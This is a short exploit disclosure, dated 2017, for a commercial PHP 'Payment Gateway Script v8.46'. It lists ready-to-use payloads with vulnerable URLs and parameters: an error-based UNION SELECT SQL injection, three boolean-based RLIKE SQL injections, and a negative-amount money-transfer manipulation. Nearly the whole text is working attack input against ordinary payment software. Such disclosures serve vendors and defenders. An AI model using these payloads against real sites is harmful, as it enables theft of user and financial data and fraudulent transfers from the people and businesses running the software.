Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/payment-gateway-script/
<http://itechscripts.com/image-sharing-script/>
Sofware Price and Demo : $400
http://payment-gateway.itechscripts.com
<http://photo-sharing.itechscripts.com/>

------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/user-profile.php
Vulnerable Parameters: token
Method: GET
Payload: -3519' UNION ALL SELECT
NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
------------------------------------------------------
Type: IDOR
Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php
Vulnerable Parameters: t_amount and t_paid
Method: POST
Payload: negative money value (ps:-1350)
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_historyDetails.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_histPrew.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------
Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/overview.php
Vulnerable Parameters: limit
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH


-- 
Best Regards,
Hasan Emre